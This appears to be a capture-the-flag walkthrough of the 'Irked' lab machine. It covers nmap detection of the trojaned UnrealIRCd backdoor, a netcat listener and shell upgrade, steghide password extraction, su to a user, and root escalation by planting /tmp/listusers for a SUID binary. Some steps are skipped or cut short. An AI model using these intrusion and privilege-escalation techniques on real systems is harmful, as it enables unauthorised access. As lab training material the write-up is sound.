The /manual directory leads us to the default Apache HTTP server page.
http://10.10.10.117/manual/en/index.html
Version 2.4
Enumeration: UnrealIRCd Ports 6697, 8067 & 65534
Another dead end. Let’s move on to other ports. Ports 22 and 111 running OpenSSH 6.7p1 and rpcbind 2–4 don’t look promising. Ports 6697, 8067 & 65534 are running UnrealIRCd. A version of this service was vulnerable to a backdoor command execution. Let’s see if there are any nmap scripts that check for this vulnerability.
Documentation tells us that not only can nmap detect it, but it can also be used to start a netcat listener that would give us a shell on the system. First, run an nmap scan to see which of these ports are vulnerable to the backdoor.
┌──(kali💀kali)-[~]
└─$ nmap -p 6697,8067,65534 --script irc-unrealircd-backdoor 10.10.10.117
6697/tcp open ircs-u
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277
8067/tcp open infi-async
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects. Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this message again).
65534/tcp open unknown
Port 8067 is vulnerable!
Shell as ircd
The next obvious step would be to get a reverse shell on the machine by exploiting the UnrealIRCd backdoor vulnerability. After attempting to do that, I spent an hour trying to figure out why neither my netcat reverse or bind shells are not working. It turns out that if you add the flag “-n” which stands for “do not do any DNS or service lookups on any specified address”, the shell doesn’t work. I’m not sure why. I’ll update this blog when I figure it out.
OPTION 1:
For now, set up a listener on the attack machine.
┌──(kali💀kali)-[~]
└─$ nc -nlvp 4444
nc -lnvp 443
Send a reverse shell to our listener from the target machine.
This gives us a partially interactive bash shell. To get a fully interactive shell, background the session (CTRL+ Z) and run the following in your terminal which tells your terminal to pass keyboard shortcuts to the shell.
stty raw -echo
Once that is done, run the command “fg” to bring netcat back to the foreground.
OPTION 2:
Based on what I found during reconnaissance, I think I can just connect with nc and enter AB; [some command] and get it to run. I’ll test with a ping. I have tcpdump running listening for icmp. Now I’ll connect, and test out my theory:
We don’t. We need to escalate privileges. In that same directory, there’s a hidden .backup file:
ircd@irked:/home/djmardov/Documents$ ls -la
ircd@irked:/home/djmardov/Documents$ cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
Steg:
With the reference to steg, I immediately think of the big image on the website. I’ll download a copy:
┌──(kali💀kali)-[~/Desktop]
└─$ wget 10.10.10.117/irked.jpg
Now I’ll try steghide, a command steg tool, with the follow arguments:
extract - I want to extract data
-sf irked.jpg - give the file to extract from
-p - passphrase
┌──(kali💀kali)-[~/Desktop]
└─$ steghide extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss
wrote extracted data to "pass.txt".
┌──(kali💀kali)-[~/Desktop]
└─$ cat pass.txt
Kab6h+m+bbp2J:HG
SU:
That password works as djmardov’s password with su:
ircd@irked:~/Unreal3.2$ su djmardov
su djmardov
Password: Kab6h+m+bbp2J:HG
djmardov@irked:/home/ircd/Unreal3.2$
Let’s try and execute the file to see what it outputs.
djmardov@irked:/tmp$ cd /usr/bin
djmardov@irked:/usr/bin$ viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2024-01-06 21:22 (:0)
It seems to be running a file /tmp/listusers, however, the file does not exist. Since the SUID bit is set for this file, it will execute with the level of privilege that matches the user who owns the file. In this case, the file is owned by root, so the file will execute with root privileges. It’s in the /tmp directory, which we have access to, so let’s create the file and have it run a bash shell.
djmardov@irked:/dev/shm$ viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2024-01-06 21:22 (:0)
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
djmardov@irked:/dev/shm$ echo sh > /tmp/listusers
djmardov@irked:/dev/shm$ viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2024-01-06 21:22 (:0)
# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
# python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
root@irked:/dev/shm#
root@irked:/dev/shm# cat /root/root.txt
cat /root/root.txt
a4da2------------------------------
